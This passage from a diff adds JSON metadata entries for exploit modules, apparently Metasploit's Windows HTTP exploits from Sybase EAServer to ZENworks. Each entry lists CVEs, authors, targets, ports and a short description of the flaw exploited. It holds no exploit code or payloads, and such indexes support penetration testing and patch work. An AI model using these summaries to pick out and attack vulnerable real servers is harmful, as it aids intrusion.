200, + "disclosure_date": "2005-07-25", + "type": "exploit", + "author": [ + "Unknown" + ], + "description": "This module exploits a stack buffer overflow in the Sybase EAServer Web\n Console. The offset to the SEH frame appears to change depending\n on what version of Java is in use by the remote server, making this\n exploit somewhat unreliable.", + "references": [ + "CVE-2005-2297", + "OSVDB-17996", + "BID-14287" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11", + "Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?", + "Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06", + "Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sybase_easerver.rb", + "is_install_path": true, + "ref_name": "windows/http/sybase_easerver", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/syncbreeze_bof": { + "name": "Sync Breeze Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/syncbreeze_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-03-15", + "type": "exploit", + "author": [ + "Daniel Teixeira", + "Andrew Smith", + "Owais Mehtab", + "Milton Valencia (wetw0rk)" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,\n and v10.1.16, caused by improper bounds checking of the request in\n HTTP GET and POST requests sent to the built-in web server. This\n module has been tested successfully on Windows 7 SP1 x86.", + "references": [ + "CVE-2017-14980" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Sync Breeze Enterprise v9.4.28", + "Sync Breeze Enterprise v10.0.28", + "Sync Breeze Enterprise v10.1.16" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/syncbreeze_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/syncbreeze_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sysax_create_folder": { + "name": "Sysax Multi Server 5.64 Create Folder Buffer Overflow", + "fullname": "exploit/windows/http/sysax_create_folder", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-29", + "type": "exploit", + "author": [ + "Craig Freyman", + "Matt \"hostess\" Andreko" + ], + "description": "This module exploits a stack buffer overflow in the create folder function in\n Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the\n vulnerability valid credentials with the create folder permission must be provided.\n The HTTP option must be enabled on Sysax too.\n\n This module will log into the server, get a SID token, find the root folder, and\n then proceed to exploit the server. Successful exploits result in SYSTEM access.\n This exploit works on XP SP3, and Server 2003 SP1-SP2.", + "references": [ + "CVE-2012-6530", + "OSVDB-82329", + "EDB-20676", + "EDB-18420", + "URL-http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html", + "URL-http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 / Sysax Multi Server 5.64", + "Windows 2003 SP1-SP2 / Sysax Multi Server 5.64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sysax_create_folder.rb", + "is_install_path": true, + "ref_name": "windows/http/sysax_create_folder", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/telerik_rau_deserialization": { + "name": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", + "fullname": "exploit/windows/http/telerik_rau_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-12-09", + "type": "exploit", + "author": [ + "Spencer McIntyre", + "Paul Taylor", + "Markus Wulftange", + "Caleb Gross", + "Alvaro Muñoz", + "Oleksandr Mirosh", + "straightblast" + ], + "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').", + "references": [ + "CVE-2017-11317", + "URL-https://github.com/bao7uo/RAU_crypto", + "URL-https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload", + "URL-https://github.com/straightblast/UnRadAsyncUpload/wiki", + "CVE-2019-18935", + "URL-https://github.com/noperator/CVE-2019-18935", + "URL-https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization", + "URL-https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html", + "URL-https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows" + ], + "mod_time": "2021-02-24 20:24:57 +0000", + "path": "/modules/exploits/windows/http/telerik_rau_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/telerik_rau_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "unreliable-session" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/telerik_report_server_deserialization": { + "name": "Telerik Report Server Auth Bypass and Deserialization RCE", + "fullname": "exploit/windows/http/telerik_report_server_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-06-04", + "type": "exploit", + "author": [ + "SinSinology", + "Soroush Dalili", + "Unknown", + "Spencer McIntyre" + ], + "description": "This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability\n (CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.\n The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.\n The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a\n new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an\n OS command as NT AUTHORITY\\SYSTEM. The module will automatically delete the created report but not the account\n because users are unable to delete themselves.", + "references": [ + "CVE-2024-1800", + "CVE-2024-4358", + "URL-https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 83, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2024-06-06 14:56:33 +0000", + "path": "/modules/exploits/windows/http/telerik_report_server_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/telerik_report_server_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ], + "RelatedModules": [ + "auxiliary/scanner/http/telerik_report_server_auth_bypass" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/tomcat_cgi_cmdlineargs": { + "name": "Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability", + "fullname": "exploit/windows/http/tomcat_cgi_cmdlineargs", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-04-10", + "type": "exploit", + "author": [ + "Yakov Shafranovich", + "sinn3r " + ], + "description": "This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the\n enableCmdLineArguments setting is set to true, a remote user can abuse this to execute\n system commands, and gain remote code execution.", + "references": [ + "CVE-2019-0232", + "URL-https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/", + "URL-https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Apache Tomcat 9.0 or prior for Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb", + "is_install_path": true, + "ref_name": "windows/http/tomcat_cgi_cmdlineargs", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/trackercam_phparg_overflow": { + "name": "TrackerCam PHP Argument Buffer Overflow", + "fullname": "exploit/windows/http/trackercam_phparg_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-02-18", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a simple stack buffer overflow in the\n TrackerCam web server. All current versions of this software\n are vulnerable to a large number of security issues. This\n module abuses the directory traversal flaw to gain\n information about the system and then uses the PHP overflow\n to execute arbitrary code.", + "references": [ + "CVE-2005-0478", + "OSVDB-13953", + "OSVDB-13955", + "BID-12592", + "URL-http://aluigi.altervista.org/adv/tcambof-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 8090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 English", + "Windows XP English SP0/SP1", + "Windows NT 4.0 SP4/SP5/SP6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/trackercam_phparg_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/trackercam_phparg_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/trackit_file_upload": { + "name": "Numara / BMC Track-It! FileStorageService Arbitrary File Upload", + "fullname": "exploit/windows/http/trackit_file_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-10-07", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!\n v8 to v11.X.\n The application exposes the FileStorageService .NET remoting service on port 9010\n (9004 for version 8) which accepts unauthenticated uploads. This can be abused by\n a malicious user to upload a ASP or ASPX file to the web root leading to arbitrary\n code execution as NETWORK SERVICE or SYSTEM.\n This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,\n 10.0.0.143, 9.0.30.248 and 8.0.2.51.", + "references": [ + "CVE-2014-4872", + "OSVDB-112741", + "US-CERT-VU-121036", + "URL-https://seclists.org/fulldisclosure/2014/Oct/34" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Numara / BMC Track-It! v9 to v11.X - Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/trackit_file_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/trackit_file_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/trendmicro_officescan": { + "name": "Trend Micro OfficeScan Remote Stack Buffer Overflow", + "fullname": "exploit/windows/http/trendmicro_officescan", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-06-28", + "type": "exploit", + "author": [ + "toto" + ], + "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n cgiChkMasterPwd.exe (running with SYSTEM privileges).", + "references": [ + "CVE-2008-1365", + "OSVDB-42499" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/trendmicro_officescan.rb", + "is_install_path": true, + "ref_name": "windows/http/trendmicro_officescan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/trendmicro_officescan_widget_exec": { + "name": "Trend Micro OfficeScan Remote Code Execution", + "fullname": "exploit/windows/http/trendmicro_officescan_widget_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-10-07", + "type": "exploit", + "author": [ + "mr_me ", + "Mehmet Ince " + ], + "description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product\n has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which\n leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process\n does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.", + "references": [ + "CVE-2017-11394", + "URL-https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/", + "URL-http://www.zerodayinitiative.com/advisories/ZDI-17-521/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "OfficeScan 11", + "OfficeScan XG" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/trendmicro_officescan_widget_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/trendmicro_officescan_widget_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ultraminihttp_bof": { + "name": "Ultra Mini HTTPD Stack Buffer Overflow", + "fullname": "exploit/windows/http/ultraminihttp_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-10", + "type": "exploit", + "author": [ + "superkojiman", + "PsychoSpy ", + "OJ Reeves " + ], + "description": "This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21,\n allowing remote attackers to execute arbitrary code via a long resource name in an HTTP\n request. This exploit has to deal with the fact that the application's request handler\n thread is terminated after 60 seconds by a \"monitor\" thread. To do this, it allocates\n some RWX memory, copies the payload to it and creates another thread. When done, it\n terminates the current thread so that it doesn't crash and hence doesn't bring down\n the process with it.", + "references": [ + "OSVDB-95164", + "EDB-26739", + "CVE-2013-5019", + "BID-61130" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "v1.21 - Windows Server 2000", + "v1.21 - Windows XP SP0", + "v1.21 - Windows XP SP2/SP3", + "v1.21 - Windows Server 2003 (Enterprise)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ultraminihttp_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/ultraminihttp_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/umbraco_upload_aspx": { + "name": "Umbraco CMS Remote Command Execution", + "fullname": "exploit/windows/http/umbraco_upload_aspx", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-28", + "type": "exploit", + "author": [ + "Toby Clarke", + "juan vazquez " + ], + "description": "This module can be used to execute a payload on Umbraco CMS 4.7.0.378.\n The payload is uploaded as an ASPX script by sending a specially crafted\n SOAP request to codeEditorSave.asmx, which permits unauthorized file upload\n via the SaveDLRScript operation. SaveDLRScript is also subject to a path\n traversal vulnerability, allowing code to be placed into the web-accessible\n /umbraco/ directory.\n\n The module writes, executes and then overwrites an ASPX script; note that\n though the script content is removed, the file remains on the target. Automatic\n cleanup of the file is intended if a meterpreter payload is used.\n\n This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows\n 7 32-bit SP1. In this scenario, the \"IIS APPPOOL\\ASP.NET v4.0\" user must have\n write permissions on the Windows Temp folder.", + "references": [ + "OSVDB-83765", + "EDB-19671", + "URL-http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html", + "URL-http://umbraco.codeplex.com/workitem/18192" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1" + ], + "mod_time": "2019-08-02 09:48:53 +0000", + "path": "/modules/exploits/windows/http/umbraco_upload_aspx.rb", + "is_install_path": true, + "ref_name": "windows/http/umbraco_upload_aspx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/vmware_vcenter_chargeback_upload": { + "name": "VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload", + "fullname": "exploit/windows/http/vmware_vcenter_chargeback_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-05-15", + "type": "exploit", + "author": [ + "Andrea Micalizzi", + "juan vazquez " + ], + "description": "This module exploits a code execution flaw in VMware vCenter Chargeback Manager,\n where the ImageUploadServlet servlet allows unauthenticated file upload. The files\n are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed.\n The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1\n on Windows 2003 SP2.", + "references": [ + "CVE-2013-3520", + "OSVDB-94188", + "BID-60484", + "ZDI-13-147" + ], + "platform": "Windows", + "arch": "x86", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/vmware_vcenter_chargeback_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/vxsrchs_bof": { + "name": "VX Search Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/vxsrchs_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-03-15", + "type": "exploit", + "author": [ + "Daniel Teixeira" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of VX Search Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "VX Search Enterprise v9.5.12" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/vxsrchs_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/vxsrchs_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/webster_http": { + "name": "Webster HTTP Server GET Buffer Overflow", + "fullname": "exploit/windows/http/webster_http", + "aliases": [], + "rank": 200, + "disclosure_date": "2002-12-02", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This exploits a stack buffer overflow in the Webster HTTP server.\n The server and source code was released within an article from\n the Microsoft Systems Journal in February 1996 titled \"Write a\n Simple HTTP-based Server Using MFC and Windows Sockets\".", + "references": [ + "CVE-2002-2268", + "OSVDB-44106", + "BID-6289", + "URL-http://www.microsoft.com/msj/archive/s25f.aspx", + "URL-http://www.netdave.com/webster/webster.htm" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP0", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/webster_http.rb", + "is_install_path": true, + "ref_name": "windows/http/webster_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ws_ftp_rce_cve_2023_40044": { + "name": "Progress Software WS_FTP Unauthenticated Remote Code Execution", + "fullname": "exploit/windows/http/ws_ftp_rce_cve_2023_40044", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-09-27", + "type": "exploit", + "author": [ + "sfewer-r7" + ], + "description": "This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code\n execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server\n prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability\n was originally discovered by AssetNote.", + "references": [ + "CVE-2023-40044", + "URL-https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis", + "URL-https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023", + "URL-https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows" + ], + "mod_time": "2023-10-04 09:39:25 +0000", + "path": "/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb", + "is_install_path": true, + "ref_name": "windows/http/ws_ftp_rce_cve_2023_40044", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/xampp_webdav_upload_php": { + "name": "XAMPP WebDAV PHP Upload", + "fullname": "exploit/windows/http/xampp_webdav_upload_php", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-01-14", + "type": "exploit", + "author": [ + "theLightCosine " + ], + "description": "This module exploits weak WebDAV passwords on XAMPP servers.\n It uses supplied credentials to upload a PHP payload and\n execute it.", + "references": [], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2018-08-20 18:08:19 +0000", + "path": "/modules/exploits/windows/http/xampp_webdav_upload_php.rb", + "is_install_path": true, + "ref_name": "windows/http/xampp_webdav_upload_php", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/xitami_if_mod_since": { + "name": "Xitami 2.5c2 Web Server If-Modified-Since Overflow", + "fullname": "exploit/windows/http/xitami_if_mod_since", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-09-24", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in the iMatix Corporation\n Xitami Web Server. If a malicious user sends an\tIf-Modified-Since\n header containing an overly long string, it may be possible to\n execute a payload remotely. Due to size constraints, this module uses\n the Egghunter technique.", + "references": [ + "CVE-2007-5067", + "OSVDB-40594", + "OSVDB-40595", + "BID-25772", + "EDB-4450" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "xigui32.exe Universal", + "xitami.exe Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/xitami_if_mod_since.rb", + "is_install_path": true, + "ref_name": "windows/http/xitami_if_mod_since", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/zentao_pro_rce": { + "name": "ZenTao Pro 8.8.2 Remote Code Execution", + "fullname": "exploit/windows/http/zentao_pro_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-06-20", + "type": "exploit", + "author": [ + "Daniel Monzón", + "Melvin Boers", + "Erik Wynter" + ], + "description": "This module exploits a command injection vulnerability in ZenTao Pro\n 8.8.2 and earlier versions in order to execute arbitrary commands with\n SYSTEM privileges.\n\n The module first attempts to authenticate to the ZenTao dashboard. It\n then tries to execute the payload by submitting fake repositories via\n the 'Repo Create' function that is accessible from the dashboard via\n CI>Repo. More precisely, the module sends HTTP POST requests to\n '/pro/repo-create.html' that inject commands in the vulnerable 'path'\n parameter which corresponds to the 'Client Path' input field.\n\n Valid credentials for a ZenTao admin account are required. This module\n has been successfully tested against ZenTao 8.8.1 and 8.8.2 running on\n Windows 10 (XAMPP server).", + "references": [ + "EDB-48633", + "CVE-2020-7361" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (x86)", + "Windows (x64)" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/zentao_pro_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/zentao_pro_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/zenworks_assetmgmt_uploadservlet": { + "name": "Novell ZENworks Asset Management Remote Execution", + "fullname": "exploit/windows/http/zenworks_assetmgmt_uploadservlet", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-11-02", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a path traversal flaw in Novell ZENworks Asset Management\n 7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file\n outside of the MalibuUploadDirectory and then make a secondary request that allows\n for arbitrary code execution.", + "references": [ + "CVE-2011-2653", + "OSVDB-77583", + "BID-50966", + "ZDI-11-342", + "URL-http://download.novell.com/Download?buildid=hPvHtXeNmCU~" + ], + "platform": "Java", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Java Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb", + "is_install_path": true, + "ref_name": "windows/http/zenworks_assetmgmt_uploadservlet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/zenworks_uploadservlet": { + "name": "Novell ZENworks Configuration Management Remote Execution", + "fullname": "exploit/windows/http/zenworks_uploadservlet", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-03-30", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0.\n By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory\n and then make a secondary request that allows for arbitrary code execution.", + "references": [ + "CVE-2010-5324", + "OSVDB-63412", + "BID-39114", + "ZDI-10-078", + "URL-http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html", + "URL-http://www.novell.com/support/kb/doc.php?id=7005573" + ], + "platform": "Java,Linux,Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Java Universal", + "Windows x86", + "Linux x86" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/zenworks_uploadservlet.rb", + "is_install_path": true, + "ref_name": "windows/http/zenworks_uploadservlet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/zoho_password_manager_pro_xml_rpc_rce": { + "name": 